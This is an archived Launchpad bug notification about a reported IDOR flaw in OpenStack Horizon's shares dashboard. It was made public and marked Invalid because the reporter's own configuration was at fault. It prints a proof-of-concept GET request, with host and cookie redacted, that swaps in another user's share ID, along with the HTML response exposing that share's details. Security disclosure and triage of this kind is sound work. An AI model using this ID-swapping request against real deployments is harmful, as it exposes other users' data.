yahoo-eng-team team mailing list archive

Thread
Date
[Bug 1861895] Re: IDOR in /dashboard/project/shares/

To: yahoo-eng-team@xxxxxxxxxxxxxxxxxxx
From: Jeremy Stanley <1861895@xxxxxxxxxxxxxxxxxx>
Date: Mon, 25 Oct 2021 15:04:21 -0000
Reply-to: Bug 1861895 <1861895@xxxxxxxxxxxxxxxxxx>
Sender: noreply@xxxxxxxxxxxxx
Given this has been over a year and a half the reporter acknowledged
they were fixing the configuration error in their environment, and they
haven't responded further to a request for update in that time, I'm
switching the report to public now.

** Information type changed from Private Security to Public

** Changed in: manila
       Status: New => Invalid

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1861895

Title:
  IDOR in /dashboard/project/shares/

Status in OpenStack Dashboard (Horizon):
  Invalid
Status in OpenStack Shared File Systems Service (Manila):
  Invalid
Status in manila-ui:
  Invalid
Status in OpenStack Security Advisory:
  Invalid

Bug description:
  Hello, I believe, I found IDOR to some information about other user's
  shares. Not sure if it's a Manila vulnerability, I cound't map this
  horizon endpoint to the one on manila API, hope you can clarify things
  for me.

  Info:
  When sending request to /dashboard/project/shares/?action=row_update&table=shares&obj_id=<share_id> , an attacker can send other user's ID and disclose information in the response, such as Name, Description, Size, Status, Visibility, Protocol, Share Network.

  Request example, where 33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a is id of
  the share which does not belong to me:

  GET /dashboard/project/shares/?action=row_update&table=shares&obj_id=33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a HTTP/1.1
  Host: <redacted>
  User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
  Accept: */*
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  X-Requested-With: XMLHttpRequest
  Connection: close
  Referer: https://<redacted>/dashboard/project/shares/
  Cookie: <redacted>

  Response example:

  HTTP/1.1 200 OK
  ...
  Content-Length: 3027

  <tr class="ajax-update status_up" data-display="File_storage_3498" data-display-key="name" data-object-id="33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a" data-update-interval="2500" data-update-url="/dashboard/project/shares/?action=row_update&amp;table=shares&amp;obj_id=33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a" id="shares__row__33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a">
      <td class="multi_select_column"><div class="themable-checkbox"><input class="table-row-multi-select" id="e7b9b987-e705-43aa-a605-f8d585e06768" name="object_ids" type="checkbox" value="33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a" /><label for="e7b9b987-e705-43aa-a605-f8d585e06768"></label></div></td><td class="word-break sortable anchor normal_column"><a href="/dashboard/project/shares/33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a/" >File_storage_3498</a></td><td class="sortable normal_column">
              1231
          </td><td class="sortable normal_column"></td><td class="sortable normal_column">
              10GiB
          </td><td class="status_up sortable normal_column">
              Available
          </td><td class="sortable normal_column">
              private
          </td><td class="sortable normal_column">
              NFS
          </td><td class="sortable normal_column">
              File_storage_3498_network
          </td><td class="actions_column"><div class="btn-group"><a id="shares__row_33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a__action_edit" class="btn data-table-action btn-default btn-sm ajax-modal btn-create" href="/dashboard/project/shares/33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a/update/"> Edit Share</a><a class="btn btn-default btn-sm dropdown-toggle" data-toggle="dropdown" href="#"><span class="fa fa-caret-down"></span></a><ul class="dropdown-menu dropdown-menu-right row_actions"><li><a id="shares__row_33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a__action_extend_share" class="btn data-table-action ajax-modal btn-create" href="/dashboard/project/shares/33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a/extend/"> Extend Share</a></li><li><a id="shares__row_33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a__action_snapshots" class="btn data-table-action ajax-modal btn-camera" href="/dashboard/project/shares/33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a/create_snapshot/"> Create Snapshot</a></li><li><a id="shares__row_33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a__action_manage_rules" class="btn data-table-action btn-edit" href="/dashboard/project/shares/33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a/rules/"> Manage Rules</a></li><li><a id="shares__row_33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a__action_update_metadata" class="btn data-table-action ajax-modal btn-create" href="/dashboard/project/shares/33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a/update_metadata/"> Edit Share Metadata</a></li><li><button data-batch-action="true" id="shares__row_33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a__action_delete" class="data-table-action btn-danger btn" name="action" help_text="This action cannot be undone." type="submit" value="shares__delete__33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a"> Delete Share</button></li></ul></div></td>
  </tr>

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1861895/+subscriptions